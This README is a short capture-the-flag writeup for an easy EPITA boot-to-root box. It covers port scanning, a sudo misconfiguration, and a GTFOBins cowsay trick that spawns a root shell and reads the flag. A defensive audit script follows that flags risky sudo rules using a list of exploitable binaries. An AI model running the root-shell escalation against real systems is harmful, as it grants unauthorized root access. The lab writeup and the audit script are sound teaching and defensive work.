ctf-chal-ji/README.md
2025-09-17 13:36:06 +02:00

JI EPITA - CTF

Challenge type: boot to root (box)

Difficulty: easy


Writeup

Enum

Scan the IP with nmap for open ports:

nmap -p- ip

Ports 22 and 31337 are open.

We find that there is a web service on port 31337.

Foothold

...

Privesc

We can see that the user is allowed to run /usr/games/cowsay as root using sudo without a password.

User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l

Using GTFOBins, we identified that this misconfiguration lets us spawn a root shell.

https://gtfobins.github.io/gtfobins/cowsay/

TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}

Solved!
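
From the defender's side, the sudo rule shown in the Privesc section is the kind of entry a periodic audit should catch. The following is an added example, not part of the original writeup: it parses `sudo -l` output and reports rules for binaries that can run arbitrary code. The `RISKY` list, the function names and the sample input are assumptions made for this example.

```sh
#!/bin/sh
# Added example: flag sudo rules that allow binaries able to run arbitrary code.
# RISKY is a short illustrative list (cowsay comes from this writeup); in practice
# it would be filled from the GTFOBins "sudo" category.
RISKY="cowsay perl python3 vim less find awk env"

# Constructed sample: the `sudo -l` output quoted in the writeup.
sample_sudo_l() {
    printf '%s\n' \
        'User l33t may run the following commands on srv1prod:' \
        '    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l'
}

# Reads `sudo -l` output on stdin and prints one line per risky rule:
#   <runas> TAB <NOPASSWD|PASSWD> TAB <command>
# Simplification: a NOPASSWD tag anywhere on the line is applied to every
# command on that line.
audit_sudo_l() {
    awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    # Rule lines start with a runas spec, e.g. "(ALL) NOPASSWD: /a, /b args"
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*/, "", line)
        runas = line; sub(/\).*/, ")", runas)
        rest = line;  sub(/^\([^)]*\)[ \t]*/, "", rest)
        tag = (rest ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
        gsub(/[A-Z_]+:[ \t]*/, "", rest)        # drop NOPASSWD:, SETENV:, ...
        m = split(rest, cmds, /,[ \t]*/)
        for (j = 1; j <= m; j++) {
            split(cmds[j], w, " ")              # w[1] = path, rest = fixed args
            k = split(w[1], parts, "/")
            base = parts[k]
            # "ALL" grants every command; otherwise match the basename
            if (w[1] == "ALL" || (base in bad))
                printf "%s\t%s\t%s\n", runas, tag, cmds[j]
        }
    }'
}

# Stand-alone run over the constructed sample
sample_sudo_l | audit_sudo_l
```

On a real host, pipe `sudo -l -U <user>` (run as root) into `audit_sudo_l` for each account; any reported rule should be removed or replaced with a narrowly scoped wrapper.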